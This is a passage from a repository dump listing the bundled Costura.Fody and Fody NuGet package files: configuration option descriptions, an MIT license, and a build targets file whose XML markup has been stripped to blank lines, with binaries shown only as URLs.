https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Costura.Fody.4.1.0/lib/net40/Costura.dll
--------------------------------------------------------------------------------
/packages/Costura.Fody.4.1.0/lib/net40/Costura.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Costura
5 |
6 |
7 |
8 |
9 | Contains methods for interacting with the Costura system.
10 |
11 |
12 |
13 |
14 | Call this to Initialize the Costura system.
15 |
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/packages/Costura.Fody.4.1.0/weaver/Costura.Fody.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Costura.Fody.4.1.0/weaver/Costura.Fody.dll
--------------------------------------------------------------------------------
/packages/Costura.Fody.4.1.0/weaver/Costura.Fody.xcf:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks
7 |
8 |
9 |
10 |
11 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.
12 |
13 |
14 |
15 |
16 | A list of unmanaged 32 bit assembly names to include, delimited with line breaks.
17 |
18 |
19 |
20 |
21 | A list of unmanaged 64 bit assembly names to include, delimited with line breaks.
22 |
23 |
24 |
25 |
26 | The order of preloaded assemblies, delimited with line breaks.
27 |
28 |
29 |
30 |
31 |
32 | This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.
33 |
34 |
35 |
36 |
37 | Controls if .pdbs for reference assemblies are also embedded.
38 |
39 |
40 |
41 |
42 | Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.
43 |
44 |
45 |
46 |
47 | As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.
48 |
49 |
50 |
51 |
52 | Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.
53 |
54 |
55 |
56 |
57 | Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.
58 |
59 |
60 |
61 |
62 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |
63 |
64 |
65 |
66 |
67 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.
68 |
69 |
70 |
71 |
72 | A list of unmanaged 32 bit assembly names to include, delimited with |.
73 |
74 |
75 |
76 |
77 | A list of unmanaged 64 bit assembly names to include, delimited with |.
78 |
79 |
80 |
81 |
82 | The order of preloaded assemblies, delimited with |.
83 |
84 |
85 |
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/.signature.p7s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Fody.6.1.1/.signature.p7s
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/License.txt:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) Simon Cropp
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in
13 | all copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
21 | THE SOFTWARE.
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/build/Fody.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(ProjectDir)FodyWeavers.xml
5 | $(MSBuildThisFileDirectory)..\
6 | $(FodyPath)netstandardtask
7 | $(FodyPath)netclassictask
8 | $(FodyAssemblyDirectory)\Fody.dll
9 | $(DefaultItemExcludes);FodyWeavers.xsd
10 | true
11 | 15
12 | $([System.Version]::Parse($(MSBuildVersion)).Major)
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
37 |
38 |
40 |
58 |
59 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
75 |
76 |
80 |
81 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
99 |
100 |
107 |
108 |
109 |
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/netclassictask/Fody.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Fody.6.1.1/netclassictask/Fody.dll
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/netclassictask/FodyCommon.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Fody.6.1.1/netclassictask/FodyCommon.dll
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/netclassictask/FodyHelpers.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Fody.6.1.1/netclassictask/FodyHelpers.dll
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/netclassictask/FodyIsolated.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Fody.6.1.1/netclassictask/FodyIsolated.dll
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/netclassictask/Mono.Cecil.Pdb.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Fody.6.1.1/netclassictask/Mono.Cecil.Pdb.dll
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/netclassictask/Mono.Cecil.Rocks.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Fody.6.1.1/netclassictask/Mono.Cecil.Rocks.dll
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/netclassictask/Mono.Cecil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Fody.6.1.1/netclassictask/Mono.Cecil.dll
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/netstandardtask/Fody.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Fody.6.1.1/netstandardtask/Fody.dll
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/netstandardtask/FodyCommon.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Fody.6.1.1/netstandardtask/FodyCommon.dll
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/netstandardtask/FodyHelpers.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Fody.6.1.1/netstandardtask/FodyHelpers.dll
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/netstandardtask/FodyIsolated.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Fody.6.1.1/netstandardtask/FodyIsolated.dll
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/netstandardtask/Mono.Cecil.Pdb.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Fody.6.1.1/netstandardtask/Mono.Cecil.Pdb.dll
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/netstandardtask/Mono.Cecil.Rocks.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Fody.6.1.1/netstandardtask/Mono.Cecil.Rocks.dll
--------------------------------------------------------------------------------
/packages/Fody.6.1.1/netstandardtask/Mono.Cecil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Fody.6.1.1/netstandardtask/Mono.Cecil.dll
--------------------------------------------------------------------------------